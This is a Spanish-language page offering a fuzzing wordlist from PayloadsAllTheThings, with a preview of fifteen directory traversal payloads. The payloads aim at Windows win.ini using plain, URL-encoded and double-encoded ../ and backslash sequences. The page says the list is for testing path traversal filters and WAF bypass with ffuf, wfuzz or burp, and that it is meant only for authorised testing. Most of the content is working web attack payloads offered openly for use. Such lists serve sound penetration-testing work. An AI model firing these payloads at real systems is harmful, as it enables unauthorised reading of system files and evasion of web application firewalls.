Directory Traversal (PayloadsAllTheThings)
Payloads de path/directory traversal que apuntan al win.ini de Windows con muchas variaciones de codificación y doble codificación de secuencias ../ y de barra invertida. Para probar filtros de path traversal y bypass de WAF.
- Tamaño
- 8.6 KB
- Categoría
- Fuzzing
- Fuente
- swisskyrepo/PayloadsAllTheThings
- Licencia
- MIT
- Herramientas recomendadas
- ffufwfuzzburp
Vista previa
Las primeras 15 entradas. Descarga o copia la lista completa (8.6 KB) con los botones de arriba.
\..\WINDOWS\win.ini \..\..\WINDOWS\win.ini \..\..\..\WINDOWS\win.ini \..\..\..\..\WINDOWS\win.ini \..\..\..\..\..\WINDOWS\win.ini \..\..\..\..\..\..\WINDOWS\win.ini %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
Payloads de path/directory traversal que apuntan al win.ini de Windows con muchas variaciones de codificación y doble codificación de secuencias ../ y de barra invertida. Para probar filtros de path traversal y bypass de WAF.
Esta lista está orientada al fuzzing de entradas y el descubrimiento de vulnerabilidades. Contiene aproximadamente 8.6 KB y funciona bien con herramientas como ffuf, wfuzz, burp. Elige la lista más pequeña que se ajuste a tu engagement: las listas más cortas son más rápidas y silenciosas para los ataques en línea, mientras que las listas más grandes ofrecen mayor cobertura para el trabajo offline donde la velocidad es menos determinante.
Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a
tu portapapeles o descargar el archivo .txt sin procesar. La lista completa se sirve directamente
desde su fuente original en GitHub.
Obtenida de swisskyrepo/PayloadsAllTheThings y distribuida bajo MIT. Utiliza wordlists únicamente contra sistemas para los que tengas autorización explícita de prueba.